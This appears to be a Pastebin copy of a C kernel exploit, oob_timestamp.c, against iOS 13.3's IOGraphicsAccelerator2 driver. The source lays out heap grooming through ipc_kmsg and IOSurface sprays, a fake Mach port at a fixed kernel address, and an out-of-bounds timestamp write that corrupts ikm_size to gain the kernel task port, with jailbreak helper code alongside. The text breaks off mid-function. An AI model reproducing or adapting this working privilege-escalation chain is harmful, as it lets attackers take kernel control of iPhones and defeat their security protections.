Advertisement
Guest User

Untitled

a guest
Feb 14th, 2020
706
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 49.49 KB | None | 0 0
  1. /*
  2. * oob_timestamp.c
  3. * Brandon Azad
  4. */
  5. #include "oob_timestamp.h"
  6.  
  7. #include <CoreFoundation/CoreFoundation.h>
  8. #include <mach/mach.h>
  9. #include <mach/mach_time.h>
  10. #include <pthread.h>
  11. #include <stdio.h>
  12. #include <sys/mman.h>
  13. #include <CommonCrypto/CommonCrypto.h>
  14. #include <CoreFoundation/CoreFoundation.h>
  15. #include <mach-o/loader.h>
  16. #include <mach/mach.h>
  17. #include <sys/sysctl.h>
  18.  
  19. #include "IOKitLib.h"
  20. #include "iosurface.h"
  21. #include "ipc_port.h"
  22. #include "kernel_alloc.h"
  23. #include "kernel_memory.h"
  24. #include "log.h"
  25. #include "mach_vm.h"
  26. #include "parameters.h"
  27. #include "platform.h"
  28. #include "jelbrekLib.h"
  29.  
  30. // ---- Exploit tuning ----------------------------------------------------------------------------
  31.  
  32. // Define this to 1 to enable device memory layout profiling.
  33. #define PROFILE_COMMAND_BUFFER_ADDRESS 0
  34. #ifndef SEG_TEXT_EXEC
  35. # define SEG_TEXT_EXEC "__TEXT_EXEC"
  36. #endif
  37.  
  38. #ifndef SECT_CSTRING
  39. # define SECT_CSTRING "__cstring"
  40. #endif
  41.  
  42. #ifndef MIN
  43. # define MIN(a, b) ((a) < (b) ? (a) : (b))
  44. #endif
  45. #define ARM_PGSHIFT_4K (12U)
  46. #define ARM_PGSHIFT_16K (14U)
  47. #define KADDR_FMT "0x%" PRIx64
  48. #define VM_KERN_MEMORY_CPU (9)
  49. #define RD(a) extract32(a, 0, 5)
  50. #define RN(a) extract32(a, 5, 5)
  51. #define SHA384_DIGEST_LENGTH (48)
  52. #define IS_RET(a) ((a) == 0xD65F03C0U)
  53. #define ADRP_ADDR(a) ((a) & ~0xFFFULL)
  54. #define ARM_PGMASK (ARM_PGBYTES - 1ULL)
  55. #define ADRP_IMM(a) (ADR_IMM(a) << 12U)
  56. #define ARM_PGBYTES (1U << arm_pgshift)
  57. //#define IO_OBJECT_NULL ((io_object_t)0)
  58. #define ADD_X_IMM(a) extract32(a, 10, 12)
  59. #define LDR_X_IMM(a) (sextract64(a, 5, 19) << 2U)
  60. #define IS_ADR(a) (((a) & 0x9F000000U) == 0x10000000U)
  61. #define IS_ADRP(a) (((a) & 0x9F000000U) == 0x90000000U)
  62. #define IS_ADD_X(a) (((a) & 0xFFC00000U) == 0x91000000U)
  63. #define IS_LDR_X(a) (((a) & 0xFF000000U) == 0x58000000U)
  64. #define LDR_X_UNSIGNED_IMM(a) (extract32(a, 10, 12) << 3U)
  65. #define kBootNoncePropertyKey "com.apple.System.boot-nonce"
  66. #define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY"
  67. #define IS_LDR_X_UNSIGNED_IMM(a) (((a) & 0xFFC00000U) == 0xF9400000U)
  68. #define ADR_IMM(a) ((sextract64(a, 5, 19) << 2U) | extract32(a, 29, 2))
  69. #define kIONVRAMForceSyncNowPropertyKey "IONVRAM-FORCESYNCNOW-PROPERTY"
  70.  
  71. #define PROC_TASK_OFF (0x10)
  72. #define OS_STRING_STRING_OFF (0x10)
  73. #define OS_DICTIONARY_COUNT_OFF (0x14)
  74. #define IPC_PORT_IP_KOBJECT_OFF (0x68)
  75. #define IO_DT_NVRAM_OF_DICT_OFF (0xC0)
  76. #define OS_DICTIONARY_DICT_ENTRY_OFF (0x20)
  77. #define CPU_DATA_CPU_EXC_VECTORS_OFF (0xE0)
  78. #define VM_KERNEL_LINK_ADDRESS (0xFFFFFFF007004000ULL)
  79. #define APPLE_MOBILE_AP_NONCE_GENERATE_NONCE_SEL (0xC8)
  80. #define kCFCoreFoundationVersionNumber_iOS_13_0_b2 (1656)
  81. #define kCFCoreFoundationVersionNumber_iOS_13_0_b1 (1652.20)
  82. #define APPLE_MOBILE_AP_NONCE_BOOT_NONCE_OS_SYMBOL_OFF (0xC0)
  83. #define PROC_P_PID_OFF (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_13_0_b2 ? 0x68 : 0x60)
  84. #define TASK_ITK_REGISTERED_OFF (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_13_0_b1 ? 0x308 : 0x2E8)
  85.  
  86.  
  87. // Set this value to 48 MB before the average of the minimum and maximum fault addresses observed
  88. // in the panic logs generated when profiling.
  89. uint64_t ADDRESS(fake_port_page) = 0xffffffe13a708000;
  90.  
  91.  
  92.  
  93. // ---- IOGraphicsAccelerator2 --------------------------------------------------------------------
  94.  
  95. const int IOAccelCommandQueue2_type = 4;
  96. const int IOAccelSharedUserClient2_type = 2;
  97. const int IOAccelSharedUserClient2_create_shmem_selector = 5;
  98. const int IOAccelCommandQueue2_set_notification_port_selector = 0;
  99. const int IOAccelCommandQueue2_submit_command_buffers_selector = 1;
  100.  
  101. struct IOAccelDeviceShmemData {
  102. void *data;
  103. uint32_t length;
  104. uint32_t shmem_id;
  105. };
  106.  
  107. struct IOAccelCommandQueueSubmitArgs_Header {
  108. uint32_t field_0;
  109. uint32_t count;
  110. };
  111.  
  112. struct IOAccelCommandQueueSubmitArgs_Command {
  113. uint32_t command_buffer_shmem_id;
  114. uint32_t segment_list_shmem_id;
  115. uint64_t notify_1;
  116. uint64_t notify_2;
  117. };
  118.  
  119. struct IOAccelSegmentListHeader {
  120. uint32_t field_0;
  121. uint32_t field_4;
  122. uint32_t segment_count;
  123. uint32_t length;
  124. };
  125.  
  126. struct IOAccelSegmentResourceList_ResourceGroup {
  127. uint32_t resource_id[6];
  128. uint8_t field_18[48];
  129. uint16_t resource_flags[6];
  130. uint8_t field_54[2];
  131. uint16_t resource_count;
  132. };
  133.  
  134. struct IOAccelSegmentResourceListHeader {
  135. uint64_t field_0;
  136. uint32_t kernel_commands_start_offset;
  137. uint32_t kernel_commands_end_offset;
  138. int total_resources;
  139. uint32_t resource_group_count;
  140. struct IOAccelSegmentResourceList_ResourceGroup resource_groups[];
  141. };
  142.  
  143. struct IOAccelKernelCommand {
  144. uint32_t type;
  145. uint32_t size;
  146. };
  147.  
  148. struct IOAccelKernelCommand_CollectTimeStamp {
  149. struct IOAccelKernelCommand command;
  150. uint64_t timestamp;
  151. };
  152.  
  153. /*
  154. * IOAccelSharedUserClient2_create_shmem
  155. *
  156. * Description:
  157. * Call IOAccelSharedUserClient2::create_shmem() to create a shared memory region. The maximum
  158. * shared region size on iOS is 96 MB.
  159. */
  160. static void
  161. IOAccelSharedUserClient2_create_shmem(io_connect_t IOAccelSharedUserClient2, size_t size,
  162. struct IOAccelDeviceShmemData *shmem) {
  163. assert(shmem != NULL);
  164. size_t out_size = sizeof(*shmem);
  165. uint64_t shmem_size = size;
  166. kern_return_t kr = IOConnectCallMethod(IOAccelSharedUserClient2,
  167. IOAccelSharedUserClient2_create_shmem_selector,
  168. &shmem_size, 1,
  169. NULL, 0,
  170. NULL, NULL,
  171. shmem, &out_size);
  172. assert(kr == KERN_SUCCESS);
  173. }
  174.  
  175. typedef uint64_t kaddr_t;
  176. typedef mach_port_t io_object_t;
  177. typedef io_object_t io_service_t;
  178. typedef io_object_t io_connect_t;
  179. typedef io_object_t io_registry_entry_t;
  180.  
  181. typedef struct {
  182. kaddr_t sec_text_start;
  183. uint64_t sec_text_sz;
  184. void *sec_text;
  185. kaddr_t sec_cstring_start;
  186. uint64_t sec_cstring_sz;
  187. void *sec_cstring;
  188. } pfinder_t;
  189.  
  190. typedef struct {
  191. kaddr_t key;
  192. kaddr_t value;
  193. } dict_entry_t;
  194.  
  195. kern_return_t
  196. mach_vm_write(vm_map_t, mach_vm_address_t, vm_offset_t, mach_msg_type_number_t);
  197.  
  198. kern_return_t
  199. mach_vm_read_overwrite(vm_map_t, mach_vm_address_t, mach_vm_size_t, mach_vm_address_t, mach_vm_size_t *);
  200.  
  201. kern_return_t
  202. mach_vm_machine_attribute(vm_map_t, mach_vm_address_t, mach_vm_size_t, vm_machine_attribute_t, vm_machine_attribute_val_t *);
  203.  
  204. kern_return_t
  205. mach_vm_region(vm_map_t, mach_vm_address_t *, mach_vm_size_t *, vm_region_flavor_t, vm_region_info_t, mach_msg_type_number_t *, mach_port_t *);
  206.  
  207. kern_return_t
  208. IOObjectRelease(io_object_t);
  209.  
  210. CFMutableDictionaryRef
  211. IOServiceMatching(const char *);
  212.  
  213. io_service_t
  214. IOServiceGetMatchingService(mach_port_t, CFDictionaryRef);
  215.  
  216. kern_return_t
  217. IOServiceOpen(io_service_t, task_port_t, uint32_t, io_connect_t *);
  218.  
  219. kern_return_t
  220. IORegistryEntrySetCFProperty(io_registry_entry_t, CFStringRef, CFTypeRef);
  221.  
  222. kern_return_t
  223. IOConnectCallStructMethod(io_connect_t, uint32_t, const void *, size_t, void *, size_t *);
  224.  
  225. kern_return_t
  226. IOServiceClose(io_connect_t);
  227. static unsigned arm_pgshift;
  228.  
  229. static kern_return_t
  230. kread_buf(kaddr_t addr, void *buf, mach_vm_size_t sz, mach_port_t tfp0) {
  231. mach_vm_address_t p = (mach_vm_address_t)buf;
  232. mach_vm_size_t read_sz, out_sz = 0;
  233.  
  234. while(sz) {
  235. read_sz = MIN(sz, ARM_PGBYTES - (addr & ARM_PGMASK));
  236. if(mach_vm_read_overwrite(tfp0, addr, read_sz, p, &out_sz) != KERN_SUCCESS || out_sz != read_sz) {
  237. return KERN_FAILURE;
  238. }
  239. p += read_sz;
  240. sz -= read_sz;
  241. addr += read_sz;
  242. }
  243. return KERN_SUCCESS;
  244. }
  245.  
  246.  
  247. static kern_return_t
  248. kread_addr(kaddr_t addr, kaddr_t *value, mach_port_t tfp0) {
  249. return kread_buf(addr, value, sizeof(*value), tfp0);
  250. }
  251.  
  252. static kern_return_t
  253.  
  254. get_kbase(kaddr_t *kslide, mach_port_t tfp0) {
  255. mach_msg_type_number_t cnt = TASK_DYLD_INFO_COUNT;
  256. vm_region_extended_info_data_t extended_info;
  257. task_dyld_info_data_t dyld_info;
  258. kaddr_t addr, cpu_exc_vectors;
  259. mach_port_t obj_nm;
  260. mach_vm_size_t sz;
  261. uint32_t magic;
  262.  
  263. if(task_info(tfp0, TASK_DYLD_INFO, (task_info_t)&dyld_info, &cnt) == KERN_SUCCESS && dyld_info.all_image_info_size) {
  264. *kslide = dyld_info.all_image_info_size;
  265. return VM_KERNEL_LINK_ADDRESS + *kslide;
  266. }
  267. addr = 0;
  268. cnt = VM_REGION_EXTENDED_INFO_COUNT;
  269. while(mach_vm_region(tfp0, &addr, &sz, VM_REGION_EXTENDED_INFO, (vm_region_info_t)&extended_info, &cnt, &obj_nm) == KERN_SUCCESS) {
  270. mach_port_deallocate(mach_task_self(), obj_nm);
  271. if(extended_info.user_tag == VM_KERN_MEMORY_CPU && extended_info.protection == VM_PROT_DEFAULT) {
  272. if(kread_addr(addr + CPU_DATA_CPU_EXC_VECTORS_OFF, &cpu_exc_vectors, tfp0) != KERN_SUCCESS || (cpu_exc_vectors & ARM_PGMASK)) {
  273. break;
  274. }
  275. INFO("cpu_exc_vectors: " KADDR_FMT "\n", cpu_exc_vectors);
  276. do {
  277. cpu_exc_vectors -= ARM_PGBYTES;
  278. if(cpu_exc_vectors <= VM_KERNEL_LINK_ADDRESS || kread_buf(cpu_exc_vectors, &magic, sizeof(magic), tfp0) != KERN_SUCCESS) {
  279. return 0;
  280. }
  281. } while(magic != MH_MAGIC_64);
  282. *kslide = cpu_exc_vectors - VM_KERNEL_LINK_ADDRESS;
  283. return cpu_exc_vectors;
  284. }
  285. addr += sz;
  286. }
  287. return 0;
  288. }
  289.  
  290. /*
  291. * IOAccelCommandQueue2_set_notification_port
  292. *
  293. * Description:
  294. * Call IOAccelCommandQueue2::set_notification_port() to set a notification port. This is
  295. * required before IOAccelCommandQueue2::submit_command_buffers() can be called.
  296. */
  297. static void
  298. IOAccelCommandQueue2_set_notification_port(io_connect_t IOAccelCommandQueue2,
  299. mach_port_t notification_port) {
  300. kern_return_t kr = IOConnectCallAsyncMethod(IOAccelCommandQueue2,
  301. IOAccelCommandQueue2_set_notification_port_selector,
  302. notification_port,
  303. NULL, 0,
  304. NULL, 0,
  305. NULL, 0,
  306. NULL, NULL,
  307. NULL, NULL);
  308. assert(kr == KERN_SUCCESS);
  309. }
  310.  
  311. /*
  312. * IOAccelCommandQueue2_submit_command_buffers
  313. *
  314. * Description:
  315. * Call IOAccelCommandQueue2::submit_command_buffers(). The submit_args should describe the
  316. * command buffer and segment list for each command.
  317. */
  318. static void
  319. IOAccelCommandQueue2_submit_command_buffers(io_connect_t IOAccelCommandQueue2,
  320. const struct IOAccelCommandQueueSubmitArgs_Header *submit_args,
  321. size_t size) {
  322. kern_return_t kr = IOConnectCallMethod(IOAccelCommandQueue2,
  323. IOAccelCommandQueue2_submit_command_buffers_selector,
  324. NULL, 0,
  325. submit_args, size,
  326. NULL, NULL,
  327. NULL, NULL);
  328. assert(kr == KERN_SUCCESS);
  329. }
  330.  
  331. // ---- Exploit functions -------------------------------------------------------------------------
  332.  
  333. #define KB (1024uLL)
  334. #define MB (1024uLL * KB)
  335. #define GB (1024uLL * MB)
  336.  
  337. /*
  338. * for_each_page
  339. *
  340. * Description:
  341. * Iterate through pages in a data region. It is assumed that the address passed is the start
  342. * of the first page. The callback is invoked with the address of each page and its index.
  343. */
  344. static void
  345. for_each_page(void *data, size_t size, void (^callback)(void *page, size_t index, bool *stop)) {
  346. size_t count = size / page_size;
  347. bool stop = false;
  348. for (size_t i = 0; i < count && !stop; i++) {
  349. callback(data, i, &stop);
  350. data = (uint8_t *) data + page_size;
  351. }
  352. }
  353.  
  354. /*
  355. * fail
  356. *
  357. * Description:
  358. * Abort the exploit.
  359. */
  360. static void _Noreturn
  361. fail() {
  362. usleep(100000);
  363. exit(1);
  364. }
  365.  
  366. // ---- Exploit -----------------------------------------------------------------------------------
  367.  
  368. void
  369. oob_timestamp() {
  370. // Test if we already have a kernel task port.
  371. mach_port_t host = mach_host_self();
  372. host_get_special_port(host, 0, 4, &kernel_task_port);
  373. if (MACH_PORT_VALID(kernel_task_port)) {
  374. INFO("tfp0: 0x%x", kernel_task_port);
  375. struct task_dyld_info info;
  376. mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
  377. task_info(kernel_task_port, TASK_DYLD_INFO, (task_info_t) &info, &count);
  378. INFO("kernel base: 0x%016llx", info.all_image_info_addr);
  379. return;
  380. }
  381.  
  382. // Check that this platform is supported.
  383. INFO("Platform: %s %s", platform.machine, platform.osversion);
  384. bool ok = parameters_init();
  385. if (!ok) {
  386. fail();
  387. }
  388.  
  389. INFO("[%llx] oob_timestamp", mach_absolute_time());
  390.  
  391. // 1. Open the IOAccelCommandQueue2 and IOAccelSharedUserClient2 user clients.
  392. io_service_t IOGraphicsAccelerator2 = IOServiceGetMatchingService(kIOMasterPortDefault,
  393. IOServiceMatching("IOGraphicsAccelerator2"));
  394. assert(IOGraphicsAccelerator2 != IO_OBJECT_NULL);
  395. io_connect_t IOAccelCommandQueue2 = IO_OBJECT_NULL;
  396. IOServiceOpen(IOGraphicsAccelerator2, mach_task_self(),
  397. IOAccelCommandQueue2_type, &IOAccelCommandQueue2);
  398. assert(IOAccelCommandQueue2 != IO_OBJECT_NULL);
  399. io_connect_t IOAccelSharedUserClient2 = IO_OBJECT_NULL;
  400. IOServiceOpen(IOGraphicsAccelerator2, mach_task_self(),
  401. IOAccelSharedUserClient2_type, &IOAccelSharedUserClient2);
  402. assert(IOAccelSharedUserClient2 != IO_OBJECT_NULL);
  403.  
  404. // 2. Initialize IOSurface.
  405. ok = IOSurface_init();
  406. assert(ok);
  407. uint32_t iosurface_property = 0;
  408.  
  409. // 3. Connect the IOAccelCommandQueue2 to IOAccelSharedUserClient2.
  410. kern_return_t kr = IOConnectAddClient(IOAccelCommandQueue2, IOAccelSharedUserClient2);
  411. assert(kr == KERN_SUCCESS);
  412.  
  413. // 4. Allocate 200 holding ports. Only about 29 will be used.
  414. struct holding_port_array holding_ports = holding_ports_create(200);
  415. struct holding_port_array all_holding_ports = holding_ports;
  416.  
  417. // 5. Create the command buffer and segment list. Each is of size 96 MB, which is the
  418. // maximum size of an IOKit pageable map allowed by XNU's IOIteratePageableMaps(). The
  419. // shared memory regions will only be mapped into the kernel on the first call to
  420. // IOAccelCommandQueue2::submit_command_buffers().
  421. const uint32_t command_buffer_size = 96 * MB;
  422. const uint32_t segment_list_size = 96 * MB;
  423. // Create the command buffer.
  424. struct IOAccelDeviceShmemData command_buffer_shmem;
  425. IOAccelSharedUserClient2_create_shmem(IOAccelSharedUserClient2,
  426. command_buffer_size, &command_buffer_shmem);
  427. void *command_buffer = command_buffer_shmem.data;
  428. // Create the segment list.
  429. struct IOAccelDeviceShmemData segment_list_shmem;
  430. IOAccelSharedUserClient2_create_shmem(IOAccelSharedUserClient2,
  431. segment_list_size, &segment_list_shmem);
  432. void *segment_list = segment_list_shmem.data;
  433. // Wire down the command buffer and segment list. This does not ensures that accessing
  434. // these pages from the kernel won't fault.
  435. mlock(command_buffer, command_buffer_size);
  436. mlock(segment_list, segment_list_size);
  437.  
  438. // 6. Register a notification port for the IOAccelCommandQueue2. No need to listen on it
  439. // (keep that infoleak well hidden!).
  440. mach_port_t notification_port = holding_port_grab(&holding_ports);
  441. IOAccelCommandQueue2_set_notification_port(IOAccelCommandQueue2, notification_port);
  442.  
  443. // 7. Set up the arguments to IOAccelCommandQueue2::submit_command_buffers().
  444. struct {
  445. struct IOAccelCommandQueueSubmitArgs_Header header;
  446. struct IOAccelCommandQueueSubmitArgs_Command command;
  447. } submit_args = {};
  448. submit_args.header.count = 1;
  449. submit_args.command.command_buffer_shmem_id = command_buffer_shmem.shmem_id;
  450. submit_args.command.segment_list_shmem_id = segment_list_shmem.shmem_id;
  451. // Segment list header.
  452. struct IOAccelSegmentListHeader *slh = (void *) segment_list;
  453. slh->length = 0x100;
  454. slh->segment_count = 1;
  455. struct IOAccelSegmentResourceListHeader *srlh = (void *)(slh + 1);
  456. srlh->kernel_commands_start_offset = 0;
  457. srlh->kernel_commands_end_offset = command_buffer_size;
  458. // CollectTimeStamp command 1 is located at the beginning of the command buffer and skips
  459. // to the end of the buffer. After calling IOAccelCommandQueue2::submit_command_buffers(),
  460. // the first of the two timestamps is written to ts_cmd_1->timestamp.
  461. struct IOAccelKernelCommand_CollectTimeStamp *ts_cmd_1 = (void *)command_buffer_shmem.data;
  462.  
  463. // 8. This function will set up the out-of-bounds timestamp write to write the specified
  464. // number of bytes past the end of the command buffer.
  465. void (^init_out_of_bounds_timestamp_write_size)(size_t) = ^(size_t overflow_size) {
  466. assert(0 <= overflow_size && overflow_size <= 8);
  467. // Make the first CollectTimeStamp command skip to the end of the buffer, leaving
  468. // enough space for a full timestamp command minus the amount we want to overflow.
  469. size_t ts_cmd_1_size = command_buffer_size - (sizeof(*ts_cmd_1) - overflow_size);
  470. ts_cmd_1->command.type = 2;
  471. ts_cmd_1->command.size = (uint32_t) ts_cmd_1_size;
  472. // CollectTimeStamp command 2 writes the timestamp past the end of the buffer. The
  473. // function IOAccelCommandQueue2::processSegmentKernelCommand() excludes the length
  474. // of the 8-byte header when verifying that the entire command is within the bounds
  475. // of the command buffer.
  476. // command
  477. // exclude the size of the IOAccelKernelCommand header
  478. // even though the timestamp part of it is out-of-bounds.
  479. void *next = ((uint8_t *) ts_cmd_1 + ts_cmd_1->command.size);
  480. struct IOAccelKernelCommand_CollectTimeStamp *ts_cmd_2 = next;
  481. ts_cmd_2->command.type = 2;
  482. ts_cmd_2->command.size = sizeof(*ts_cmd_1) - 8;
  483. };
  484.  
  485. // TODO: Separate kmem_alloc() spray with larger element size for padding out the kfree()
  486. // region.
  487.  
  488. // 9. Prepare the IOSurface kmem_alloc() spray for padding out the kfree() region and for
  489. // reallocating the out-of-line ports. We can use the rest of the segment list buffer as
  490. // scratch space for this.
  491. //
  492. // TODO: For now, we'll use a static address for our fake port. This value works on my
  493. // factory-reset iPhone12,3 64GB on iOS 13.3 17C54 when run about 30 seconds after boot
  494. // with no other apps launched. It will vary widely depending on your exact device and what
  495. // processes are running. To get a sense of what value to use, you can define
  496. // PROFILE_COMMAND_BUFFER_ADDRESS below.
  497. uint64_t fake_port_offset = 0x100;
  498. uint64_t fake_port_address = ADDRESS(fake_port_page) + fake_port_offset;
  499. void *ool_ports_reallocation_array_buffer = (uint8_t *) segment_list + page_size;
  500. size_t ool_ports_reallocation_array_buffer_size = segment_list_size - page_size;
  501. ok = IOSurface_kmem_alloc_array_fast_prepare_(
  502. 16 * page_size, // Each kmem_alloc() is 16 pages
  503. 80 * MB, // Spray 80 MB
  504. ool_ports_reallocation_array_buffer, // The buffer to use
  505. &ool_ports_reallocation_array_buffer_size, // The size of the buffer
  506. ^(void *data, size_t index) { // Initialization callback
  507. // Place a fake Mach port pointer as the first item in the fake OOL ports array.
  508. *(uint64_t *)(data + 8 * page_size) = fake_port_address;
  509. });
  510. if (!ok) {
  511. ERROR("Failed to prepare OOL ports reallocation spray");
  512. fail();
  513. }
  514.  
  515. // 10. Allocate 120 MB of 7-page kalloc allocations for a kalloc fragmentation. Put at most
  516. // 10 MB in each port. We want to fill the kalloc_map and start allocating from the
  517. // kernel_map near the middle of this spray.
  518. //
  519. // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
  520. // | zalloc map | kalloc map | 7 | 7 | 7 | 7 | 7 | 7 | 7 | 7 | 7 | 7 | 7 |
  521. // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
  522. struct ipc_kmsg_kalloc_fragmentation_spray fragmentation_spray;
  523. ipc_kmsg_kalloc_fragmentation_spray_(&fragmentation_spray,
  524. 7 * page_size, // 7-page kalloc allocations
  525. 120 * MB, // 120 MB total spray
  526. 10 * MB, // 10 MB per port
  527. &holding_ports);
  528.  
  529. // 11. Free 30 MB of the fragmentation spray from each end. This should create enough free
  530. // space in both the kalloc_map and the kernel_map to satisfy most allocations smaller than
  531. // 8 pages.
  532. //
  533. // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
  534. // | zalloc map | kalloc map | 7 | | 7 | | 7 | 7 | 7 | | 7 | | 7 |
  535. // --#==============#=================+===+===+===+===#---+---+---+---+---+---+---+--------
  536. ipc_kmsg_kalloc_fragmentation_spray_fragment_memory_(&fragmentation_spray, 30 * MB, +1);
  537. ipc_kmsg_kalloc_fragmentation_spray_fragment_memory_(&fragmentation_spray, 30 * MB, -1);
  538.  
  539. // 12. Allocate 200 MB of 8-page kalloc allocations. This should be enough to fill any
  540. // remaining 8-page holes in the kalloc_map and kernel_map and start allocating from fresh
  541. // VA space in the kernel_map.
  542. //
  543. // -+---+---+---+---+----+-----------+----+----+----+----+---------+-----------------------
  544. // | | 7 | | 7 | 8 | old alloc | 8 | 8 | 8 | 8 | 8 | 8 | fresh VA space ->
  545. // -+---+---+---+---+----+-----------+----+----+----+----+---------+-----------------------
  546. struct ipc_kmsg_kalloc_spray kalloc_8page_spray;
  547. ipc_kmsg_kalloc_spray_(&kalloc_8page_spray,
  548. NULL, // Zero-fill the message data.
  549. 8 * page_size, // 8-page kalloc allocations.
  550. 200 * MB, // 200 MB total spray.
  551. 0, // Max spray size per port.
  552. &holding_ports);
  553.  
  554. // 13. Create an 82 MB kalloc allocation in the kernel_map. This serves two purposes:
  555. // First, when we later spray kmem_alloc allocations to pad the over-freed region and then
  556. // again to reallocate the freed OOL ports array, we'll need a hole in which the kernel can
  557. // map in the 80 MB data blob needed to produce that spray. Second, in order to avoid
  558. // triggering a "kfree: size %u > kalloc_largest_allocated" panic when freeing the
  559. // corrupted ipc_kmsg, we also need to actually perform a kalloc allocation larger than the
  560. // maximum possible kfree() size that could result from destroying the corrupted ipc_kmsg.
  561. //
  562. // ----------------------------+-----------------+-----------------------------------------
  563. // <- all 8 page holes filled | huge kalloc | fresh VA space ->
  564. // ----------------------------+-----------------+-----------------------------------------
  565. // 82 MB
  566. uint32_t huge_kalloc_key = IOSurface_property_key(iosurface_property++);
  567. ok = IOSurface_kalloc_fast(huge_kalloc_key, 82 * MB);
  568. if (!ok) {
  569. ERROR("Could not allocate huge kalloc IOSurface buffer");
  570. fail();
  571. }
  572.  
  573. // 14. Allocate the IOKit pageable memory regions via XNU's IOIteratePageableMaps(). The
  574. // maximum size of an IOKit pageable map is 96 MB, so creating a command buffer and segment
  575. // list each of size 96 MB will ensure that they are each allocated to their own pageable
  576. // map. This both maximizes the space available for shared memory address prediction and
  577. // ensures that the out-of-bounds write off the end of the command buffer will fall into
  578. // the next adjacent memory region.
  579. //
  580. // ---------------+-----------------+------------------+------------------+----------------
  581. // <- 8PG filled | huge kalloc | segment list | command buffer |
  582. // ---------------+-----------------+------------------+------------------+----------------
  583. // 82 MB 96 MB 96 MB
  584. extern uint64_t mach_absolute_time(void);
  585. init_out_of_bounds_timestamp_write_size(0);
  586. #if PROFILE_COMMAND_BUFFER_ADDRESS
  587. init_out_of_bounds_timestamp_write_size(8);
  588. #endif
  589. IOAccelCommandQueue2_submit_command_buffers(IOAccelCommandQueue2,
  590. &submit_args.header, sizeof(submit_args));
  591.  
  592. // 15. Allocate a single 8-page ipc_kmsg and store it in a holding port. This ipc_kmsg
  593. // should fall directly after the command buffer pageable map.
  594. //
  595. // ------------------+------------------+-----------+--------------------------------------
  596. // segment list | command buffer | ipc_kmsg |
  597. // ------------------+------------------+-----------+--------------------------------------
  598. // 82 MB 96 MB 8 PG
  599. mach_port_t corrupted_kmsg_port = holding_port_pop(&holding_ports);
  600. ipc_kmsg_kalloc_send_one(corrupted_kmsg_port, 8 * page_size);
  601.  
  602. // 16. Allocate a single 8-page array of out-of-line ports descriptors.
  603. //
  604. // Ideally we'd allocate more than one array of out-of-line ports. However, these arrays
  605. // are allocated with kalloc() which sets the KMA_ATOMIC flag, meaning they cannot be only
  606. // partially freed. Each additional array of out-of-line ports would bump up the minimum
  607. // free size, which means we'd need to allocate even more kfree() buffer memory.
  608. //
  609. // ------------------+------------------+-----------+-----------+--------------------------
  610. // segment list | command buffer | ipc_kmsg | ool ports |
  611. // ------------------+------------------+-----------+-----------+--------------------------
  612. // 82 MB 96 MB 8 PG 8 PG
  613. size_t ool_port_count = (7 * page_size) / sizeof(uint64_t) + 1;
  614. mach_port_t ool_ports_msg_holding_port = holding_port_pop(&holding_ports);
  615. ok = ool_ports_send_one(ool_ports_msg_holding_port,
  616. NULL, // Use MACH_PORT_NULL for every port
  617. ool_port_count, // Enough ports to just spill onto 8 pages
  618. MACH_MSG_TYPE_MOVE_RECEIVE, // Get a receive right
  619. 256); // Send a message of size 256.
  620. if (!ok) {
  621. ERROR("Failed to send out-of-line Mach ports");
  622. fail();
  623. }
  624.  
  625. // 17. Free the kalloc placeholder. This creates a hole into which the XML data blob for
  626. // the following spray can be mapped. There is also about 2 MB of slack (for no particular
  627. // reason).
  628. //
  629. // --------+-----------------+-----------+-----------+------+------+-----------------------
  630. // <- 8PG | | seglist | cmdbuf | kmsg | ool |
  631. // -filled-+-----------------+-----------+-----------+------+------+-----------------------
  632. // 82 MB 96 MB 96 MB 8 PG 8 PG
  633. IOSurface_remove_property(huge_kalloc_key);
  634.  
  635. // 18. In order to avoid triggering a "vm_map_delete(...): hole after %p" panic, we need to
  636. // ensure that the next 80 MB (0x05000000 bytes) after the OOL ports array are allocated.
  637. // Furthermore, this memory cannot be allocated with kalloc(), since kalloc() sets the
  638. // KMA_ATOMIC flag (which means that the allocation cannot be partially freed, as will
  639. // probably happen when we destroy the corrupted ipc_kmsg). Thus, we will spray
  640. // kmem_alloc() allocations using IOSurface.
  641. //
  642. // (Ideally we'd directly allocate an 80 MB kmem_alloc() buffer to avoid the step below,
  643. // but this is larger than the maximum size possible using the OSUnserializeBinary() API.)
  644. //
  645. // What we spray isn't important, all we need to do is ensure that all additional
  646. // memory that might be kfree()d is allocated with kmem_alloc() allocations.
  647. //
  648. // --------+-----------------+-----------+-----------+------+------+--+--+--+--+--+--------
  649. // <- 8PG | [80 MB XML map] | seglist | cmdbuf | kmsg | ool | kfree buffer |
  650. // -filled-+-----------------+-----------+-----------+------+------+--+--+--+--+--+--------
  651. // 82 MB 96 MB 96 MB 8 PG 8 PG 80 MB
  652. uint32_t kfree_buffer_key = IOSurface_property_key(iosurface_property++);
  653. ok = IOSurface_kmem_alloc_array_fast(kfree_buffer_key,
  654. ool_ports_reallocation_array_buffer, // The pre-initialized buffer
  655. ool_ports_reallocation_array_buffer_size); // The size
  656. if (!ok) {
  657. ERROR("Could not allocate kfree region buffer");
  658. fail();
  659. }
  660.  
  661. // 19. We will use the out-of-bounds timestamp write to overwrite the ipc_kmsg's ikm_size
  662. // field with a value in the range [0x0003ffa9, 0x0400a8ff]. In order to control the value
  663. // written, we need to do some math.
  664. //
  665. // We assume that the timestamp will change by at most 0x10000 between when we call
  666. // mach_absolute_time() in userspace and when the timestamp is written over ikm_size. This
  667. // bound is highly conservative: in practice it rarely changes more than 0x1000, and is
  668. // often closer to 0x300. Furthermore, it's easy to test whether this assumption was
  669. // violated and redo the out-of-bounds write if necessary, so the exact tolerance value is
  670. // not critical.
  671. //
  672. // ikm_size is 4 bytes and immediately followed by 4 bytes of padding, so we can safely
  673. // overflow past ikm_size without worrying about corrupting anything.
  674. size_t (^compute_overflow_size_for_timestamp)(uint64_t) = ^size_t(uint64_t ts) {
  675. // [___+____] [___+____] [0003ffa9, 0400a8ff]
  676. if (0x000000000003ffa8 < ts && ts <= 0x0000000003ffa8ff) {
  677. return 8;
  678. }
  679. // [_____+__] [_____+__] [0003ffa9, 03ffa9ff]
